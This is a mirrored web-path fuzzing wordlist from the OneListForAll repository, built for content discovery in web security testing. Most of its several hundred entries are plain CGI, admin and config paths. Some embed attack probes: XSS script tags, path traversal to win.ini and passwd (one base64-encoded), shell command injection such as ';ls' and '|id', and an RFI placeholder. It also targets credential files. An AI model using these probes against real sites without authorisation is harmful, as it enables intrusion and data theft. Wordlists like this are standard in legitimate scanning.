mirror of
https://github.com/six2dez/OneListForAll.git
synced 2024-09-11 20:17:17 +03:00
558 lines
11 KiB
Plaintext
558 lines
11 KiB
Plaintext
.access
|
|
.cobalt
|
|
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
|
|
.fhp
|
|
.htaccess
|
|
.htaccess.old
|
|
.htaccess.save
|
|
.htaccess~
|
|
.htpasswd
|
|
.nsconfig
|
|
.passwd
|
|
.printer
|
|
.www_acl
|
|
.wwwacl
|
|
14all-1.1.cgi?cfg=../../../../../../../..win.ini
|
|
14all.cgi?cfg=../../../../../../../..win.ini
|
|
<script>alert('XSS')</script>.aspx
|
|
_layouts/alllibs.htm
|
|
_layouts/settings.htm
|
|
_layouts/userinfo.htm
|
|
_vti_bin/
|
|
_vti_bin/_vti_aut/fp30reg.dll
|
|
_vti_pvt/
|
|
_vti_pvt/doctodep.btr
|
|
_WEB_INF/
|
|
a1disp3.cgi?../../../../../../../../../..win.ini
|
|
a1stats/a1disp3.cgi?../../../../../../../../../..win.ini
|
|
a1stats/a1disp3.cgi?../../../../../../..win.ini
|
|
a1stats/a1disp4.cgi?../../../../../../..win.ini
|
|
AccessPlatform/
|
|
AccessPlatform/auth/
|
|
AccessPlatform/auth/clientscripts/
|
|
AccessPlatform/auth/clientscripts/cookies.js
|
|
AccessPlatform/auth/clientscripts/login.js
|
|
add_ftp.cgi
|
|
addbanner.cgi
|
|
adduser.cgi
|
|
admin.cgi
|
|
admin.cgi?list=../../../../../../../../../..win.ini
|
|
admin.php
|
|
admin.php3
|
|
admin.pl
|
|
adminhot.cgi
|
|
adminwww.cgi
|
|
adovbs.inc
|
|
aglimpse
|
|
aglimpse.cgi
|
|
amadmin.pl
|
|
anacondaclip.pl?template=../../../../../../../../../..win.ini
|
|
ans.pl?p=../../../../../usr/bin/id|&blah
|
|
ans/ans.pl?p=../../../../../usr/bin/id|&blah
|
|
AnyBoard.cgi
|
|
anyboard.cgi
|
|
AnyForm
|
|
AnyForm2
|
|
archie
|
|
architext_query.cgi
|
|
architext_query.pl
|
|
ash
|
|
aspnet_files/
|
|
astrocam.cgi
|
|
AT-admin.cgi
|
|
AT-generate.cgi
|
|
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
|
|
auction/auction.cgi?action=
|
|
auctiondeluxe/auction.pl
|
|
auktion.cgi?menue=../../../../../../../../../..win.ini
|
|
auth_data/auth_user_file.txt
|
|
awl/auctionweaver.pl
|
|
awstats.pl
|
|
awstats/awstats.pl
|
|
ax-admin.cgi
|
|
ax.cgi
|
|
axs.cgi
|
|
Backup/add-passwd.cgi
|
|
badmin.cgi
|
|
banner.cgi
|
|
bannereditor.cgi
|
|
bash
|
|
bb-hist?HI
|
|
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
|
|
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
|
|
bbs_forum.cgi
|
|
betsie/parserl.pl/<script>alert('XSS')</script>;
|
|
bigconf.cgi?command=view_textfile&file=win.ini&filters=
|
|
bizdb1-search.cgi
|
|
blog/
|
|
blog/mt-check.cgi
|
|
blog/mt-load.cgi
|
|
blog/mt.cfg
|
|
bnbform
|
|
bnbform.cgi
|
|
boozt/admin/index.cgi?section=5&input=1
|
|
bsguest.cgi?email=x;ls
|
|
bslist.cgi?email=x;ls
|
|
build.cgi
|
|
bulk/bulk.cgi
|
|
C
|
|
c_download.cgi
|
|
cached_feed.cgi
|
|
cachemgr.cgi
|
|
calendar
|
|
calendar.pl
|
|
calendar/index.cgi
|
|
calender_admin.pl
|
|
cart.pl
|
|
cart.pl?db='
|
|
cartmanager.cgi
|
|
cbmc/forums.cgi
|
|
ccbill-local.cgi?cmd=MENU
|
|
ccbill-local.pl?cmd=MENU
|
|
certcontrol/
|
|
certenroll/
|
|
certsrv/
|
|
cgforum.cgi
|
|
cgi
|
|
cgi-bin/htmlscript
|
|
cgi-lib.pl
|
|
cgicso?query=<script>alert('XSS')</script>
|
|
cgicso?query=AAA
|
|
cgiwrap
|
|
cgiwrap/~@U
|
|
cgiwrap/~JUNK(5)
|
|
cgiwrap/~root
|
|
change-your-password.pl
|
|
citrix/
|
|
Citrix//AccessPlatform/auth/clientscripts/cookies.js
|
|
citrix/AccessPlatform/auth/
|
|
citrix/AccessPlatform/auth/clientscripts/
|
|
Citrix/AccessPlatform/auth/clientscripts/login.js
|
|
Citrix/PNAgent/config.xml
|
|
classified.cgi
|
|
classifieds
|
|
classifieds.cgi
|
|
classifieds/classifieds.cgi
|
|
classifieds/index.cgi
|
|
clickcount.pl?view=test
|
|
clickresponder.pl
|
|
code.php
|
|
code.php3
|
|
com5..........................................................................................................................................................................................................................box
|
|
com5.java
|
|
com5.pl
|
|
commandit.cgi
|
|
common.php?f=0&ForumLang=../../../../../../../../../..win.ini
|
|
common/listrec.pl
|
|
compatible.cgi
|
|
Count.cgi
|
|
count.cgi
|
|
counter-ord
|
|
counterbanner
|
|
counterbanner-ord
|
|
counterfiglet-ord
|
|
counterfiglet/nc/
|
|
cs
|
|
csh
|
|
csLive
|
|
csNews.cgi
|
|
csPassword.cgi
|
|
csPassword/csPassword.cgi
|
|
cstat.pl
|
|
cutecast/members/
|
|
cvsblame.cgi?file=<script>alert('XSS')</script>
|
|
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
|
|
cvslog.cgi?file=<script>alert('XSS')</script>
|
|
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
|
|
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
|
|
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
|
|
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script>
|
|
dasp/fm_shell.asp
|
|
data/fetch.php?page=
|
|
date
|
|
day5datacopier.cgi
|
|
day5datanotifier.cgi
|
|
db2www/library/document.d2w/show
|
|
db4web_c/dbdirname/win.ini
|
|
db_manager.cgi
|
|
dbman/db.cgi?db=no-db
|
|
DC
|
|
DCFORM
|
|
dcshop/auth_data/auth_user_file.txt
|
|
dcshop/orders/orders.txt
|
|
dfire.cgi
|
|
diagnose.cgi
|
|
dig.cgi
|
|
displayTC.pl
|
|
dnewsweb
|
|
donothing
|
|
dose.pl?daily&somefile.txt&|ls|
|
|
download.cgi
|
|
dumpenv.pl
|
|
edit.pl
|
|
empower?DB=whateverwhatever
|
|
enter.cgi
|
|
environ.cgi
|
|
environ.pl
|
|
environ.pl?param1=<script>alert(document.cookie)</script>
|
|
ex-logger.pl
|
|
Exadmin/
|
|
Exchange/
|
|
exchange/root.asp
|
|
ExchWeb/
|
|
excite
|
|
excite;IF
|
|
ezadmin.cgi
|
|
ezboard.cgi
|
|
ezman.cgi
|
|
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..win.ini&distinct=1
|
|
ezshopper2/loadpage.cgi
|
|
ezshopper3/loadpage.cgi
|
|
File
|
|
filemail
|
|
filemail.pl
|
|
finger
|
|
finger.pl
|
|
flexform
|
|
flexform.cgi
|
|
fom.cgi?file=<script>alert('XSS')</script>
|
|
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
|
|
formmail
|
|
formmail.cgi
|
|
FormMail.cgi?<script>alert(\
|
|
FormMail.pl
|
|
formmail.pl
|
|
fortune
|
|
forum.asp
|
|
forum_arc.asp
|
|
forum_professionnel.asp
|
|
ftp.pl
|
|
ftpsh
|
|
gbadmin.cgi?action=change_adminpass
|
|
gbadmin.cgi?action=change_automail
|
|
gbadmin.cgi?action=colors
|
|
gbadmin.cgi?action=setup
|
|
gbook/gbook.cgi?_MAILTO=xx;ls
|
|
gbpass.pl
|
|
getdoc.cgi
|
|
gettransbitmap
|
|
gH.cgi
|
|
glimpse
|
|
gm-authors.cgi
|
|
gm-cplog.cgi
|
|
gm.cgi
|
|
guestbook.cgi
|
|
guestbook.pl
|
|
guestbook/passwd
|
|
handler.cgi
|
|
hitview.cgi
|
|
horde/test.php
|
|
horde/test.php?mode=phpinfo
|
|
htgrep?file=index.html&hdr=win.ini
|
|
html2chtml.cgi
|
|
html2wml.cgi
|
|
htmlscript?../../../../../../../../../..win.ini
|
|
htsearch?-c/nonexistant
|
|
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
|
|
ibill.pm
|
|
icat
|
|
if/admin/nph-build.cgi
|
|
iiasdmpwd/
|
|
iisadmin/
|
|
iisadmpwd/achg.htr
|
|
iisadmpwd/aexp.htr
|
|
iisadmpwd/aexp2.htr
|
|
iisadmpwd/aexp2b.htr
|
|
iisadmpwd/aexp3.htr
|
|
iisadmpwd/aexp4.htr
|
|
iisadmpwd/aexp4b.htr
|
|
iisadmpwd/anot.htr
|
|
iisadmpwd/anot3.htr
|
|
iishelp/
|
|
iishelp/iis/misc/default.asp
|
|
iissamples/
|
|
ikonboard/help.cgi?
|
|
imageFolio.cgi
|
|
ImageFolio/admin/admin.cgi
|
|
imagefolio/admin/admin.cgi
|
|
imagemap
|
|
imprimer.asp
|
|
include/new-visitor.inc.php
|
|
includes/adovbs.inc
|
|
index.js0x70
|
|
index.pl
|
|
index.shtml
|
|
info2www
|
|
info2www '(../../../../../../../bin/mail root <win.ini>
|
|
infosrch.cgi
|
|
ion-p?page=../../../../..win.ini
|
|
jailshell
|
|
jj
|
|
ksh
|
|
lastlines.cgi?process
|
|
listrec.pl
|
|
loadpage.cgi?user_id=1&file=../../../../../../../../../..win.ini
|
|
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
|
|
log-reader.cgi
|
|
log/
|
|
log/nether-log.pl?checkit
|
|
login.cgi
|
|
login.pl
|
|
login.pl?course_id=\
|
|
logit.cgi
|
|
logs.pl
|
|
logs/
|
|
logs/access_log
|
|
logs/error_log
|
|
lookwho.cgi
|
|
ls
|
|
LWGate
|
|
lwgate
|
|
LWGate.cgi
|
|
lwgate.cgi
|
|
magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../..win.ini
|
|
mail
|
|
mailit.pl
|
|
maillist.cgi
|
|
maillist.pl
|
|
mailnews.cgi
|
|
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..win.ini
|
|
majordomo.pl
|
|
man2html
|
|
mastergate/search.cgi?search=0&search_on=all
|
|
meta.pl
|
|
mgrqcgi
|
|
Microsoft-Server-ActiveSync/
|
|
mini_logger.cgi
|
|
mmstdod.cgi
|
|
moin.cgi?test
|
|
mojo/mojo.cgi
|
|
mrtg.cfg?cfg=../../../../../../../..win.ini
|
|
mrtg.cgi?cfg=../../../../../../../..win.ini
|
|
mrtg.cgi?cfg=blah
|
|
ms_proxy_auth_query/
|
|
msadc/
|
|
mt-static/
|
|
mt-static/mt-check.cgi
|
|
mt-static/mt-load.cgi
|
|
mt-static/mt.cfg
|
|
mt/
|
|
mt/mt-check.cgi
|
|
mt/mt-load.cgi
|
|
mt/mt.cfg
|
|
musicqueue.cgi
|
|
myguestbook.cgi?action=view
|
|
namazu.cgi
|
|
nbmember.cgi?cmd=list_all_users
|
|
netauth.cgi?cmd=show&page=../../../../../../../../../..win.ini
|
|
netpad.cgi
|
|
newsdesk.cgi?t=../../../../../../../../../..win.ini
|
|
nimages.php
|
|
nlog-smb.cgi
|
|
nlog-smb.pl
|
|
non-existent.pl
|
|
noshell
|
|
nph-error.pl
|
|
nph-exploitscanget.cgi
|
|
nph-maillist.pl
|
|
nph-publish
|
|
nph-publish.cgi
|
|
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
|
|
nph-test-cgi
|
|
ntitar.pl
|
|
null.htw
|
|
OMA/
|
|
opendir.php?win.ini
|
|
orders/orders.txt
|
|
OWA/
|
|
pagelog.cgi
|
|
pals-cgi?palsAction=restart&documentName=win.ini
|
|
parse-file
|
|
pass
|
|
passwd
|
|
passwd.txt
|
|
password
|
|
pbserver/pbserver.dll
|
|
perl
|
|
perl?-v
|
|
perlshop.cgi
|
|
pfdispaly.cgi?../../../../../../../../../..win.ini
|
|
phf
|
|
phf.cgi?QALIA
|
|
photo/
|
|
photo/manage.cgi
|
|
photo/protected/manage.cgi
|
|
php-cgi
|
|
php.cgi?win.ini
|
|
plusmail
|
|
pollit/Poll_It_
|
|
pollssi.cgi
|
|
post-query
|
|
post_query
|
|
postcards.cgi
|
|
postinfo.html
|
|
powerup/r.cgi?FILE=../../../../../../../../../..win.ini
|
|
printenv
|
|
printenv.tmp
|
|
probecontrol.cgi?command=enable&username=cancer&password=killer
|
|
processit.pl
|
|
profile.cgi
|
|
pu3.pl
|
|
Public/
|
|
query
|
|
quikstore.cfg
|
|
quizme.cgi
|
|
r.cgi?FILE=../../../../../../../../../..win.ini
|
|
ratlog.cgi
|
|
redirect
|
|
register.cgi
|
|
replicator/webpage.cgi/
|
|
responder.cgi
|
|
retrieve_password.pl
|
|
rksh
|
|
rmp_query
|
|
robadmin.cgi
|
|
robpoll.cgi
|
|
rpm_query
|
|
rsh
|
|
rtm.log
|
|
rubrique.asp
|
|
rwcgi60
|
|
rwcgi60/showenv
|
|
rwwwshell.pl
|
|
sbcgi/sitebuilder.cgi
|
|
scoadminreg.cgi
|
|
scripts/
|
|
scripts/cgimail.exe
|
|
scripts/convert.bas
|
|
scripts/counter.exe
|
|
scripts/fpcount.exe
|
|
scripts/iisadmin/ism.dll?http/dir
|
|
scripts/no-such-file.pl
|
|
scripts/samples/search/webhits.exe
|
|
scripts/tools/getdrvs.exe
|
|
scripts/tools/newdsn.exe
|
|
search.cgi
|
|
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
|
|
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
|
|
search.php?searchstring=<script>alert(document.cookie)</script>
|
|
search.pl
|
|
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script>
|
|
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
|
|
sendform.cgi
|
|
sendtemp.pl?templ=../../../../../../../../../..win.ini
|
|
session/adminlogin
|
|
sewse?/home/httpd/html/sewse/jabber/comment2.jse+win.ini
|
|
sh
|
|
share/
|
|
shop.cgi?page=../../../../../../..win.ini
|
|
shop/auth_data/auth_user_file.txt
|
|
shop/orders/orders.txt
|
|
shopper.cgi?newpage=../../../../../../../../../..win.ini
|
|
show.pl
|
|
showcheckins.cgi?person=<script>alert('XSS')</script>
|
|
showuser.cgi
|
|
simplestguest.cgi
|
|
simplestmail.cgi
|
|
spin_client.cgi?aaaaaaaa
|
|
ss
|
|
sscd_suncourier.pl
|
|
stat.pl
|
|
stat/
|
|
stats-bin-p/reports/index.html
|
|
stats.pl
|
|
stats.prf
|
|
stats/
|
|
stats/statsbrowse.asp?filepath=c:\&Opt=3
|
|
stats_old/
|
|
statsconfig
|
|
statusconfig.pl
|
|
statview.pl
|
|
store.cgi?
|
|
store/agora.cgi?cart_id=<script>alert('XSS')</script>
|
|
store/agora.cgi?page=whatever33.html
|
|
store/index.cgi?page=../../../../../../../..win.ini
|
|
survey
|
|
survey.cgi
|
|
sws/admin.html
|
|
sws/manager.pl
|
|
tablebuild.pl
|
|
tcsh
|
|
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..win.ini
|
|
test-cgi.tcl
|
|
test-cgi?/*
|
|
test-env
|
|
test.cgi
|
|
test/test.cgi
|
|
texis/junk
|
|
texis/phine
|
|
textcounter.pl
|
|
tidfinder.cgi
|
|
tigvote.cgi
|
|
title.cgi
|
|
tpgnrock
|
|
traffic.cgi?cfg=../../../../../../../..win.ini
|
|
troops.cgi
|
|
tsweb/
|
|
ttawebtop.cgi/?action=start&pg=../../../../../../../../../..win.ini
|
|
ultraboard.cgi
|
|
ultraboard.pl
|
|
unlg1.1
|
|
unlg1.2
|
|
update.dpgs
|
|
upload.cgi
|
|
Upload.pl
|
|
uptime
|
|
ustorekeeper.pl?command=goto&file=../../../../../../../../../..win.ini
|
|
utm/admin
|
|
utm/utm_stat
|
|
view-source
|
|
view-source?view-source
|
|
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
|
|
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
|
|
viewlogs.pl
|
|
viewsource?win.ini
|
|
viralator.cgi
|
|
virgil.cgi
|
|
vote.cgi
|
|
vpasswd.cgi
|
|
vq/demos/respond.pl?<script>alert('XSS')</script>
|
|
Vs
|
|
W
|
|
w3-msql
|
|
w3-sql
|
|
wais.pl
|
|
webais
|
|
webbbs.cgi
|
|
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
|
|
webdriver
|
|
webgais
|
|
webif.cgi
|
|
webmap.cgi
|
|
webnews.pl
|
|
webplus?about
|
|
webplus?script=../../../../../../../../../..win.ini
|
|
websendmail
|
|
webspirs.cgi?sp.nextform=../../../../../../../../../..win.ini
|
|
webutil.pl
|
|
webutils.pl
|
|
webwho.pl
|
|
windmail
|
|
wrap
|
|
wrap.cgi
|
|
ws_ftp.ini
|
|
www-sql
|
|
wwwadmin.pl
|
|
wwwboard.cgi.cgi
|
|
wwwboard.pl
|
|
wwwstats.pl
|
|
wwwthreads/3tvars.pm
|
|
wwwthreads/w3tvars.pm
|
|
wwwwais
|
|
x.htw
|
|
x.ida
|
|
x.idq
|
|
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
|
|
zsh
|
|
~/<script>alert('XSS')</script>.asp
|
|
~/<script>alert('XSS')</script>.aspx |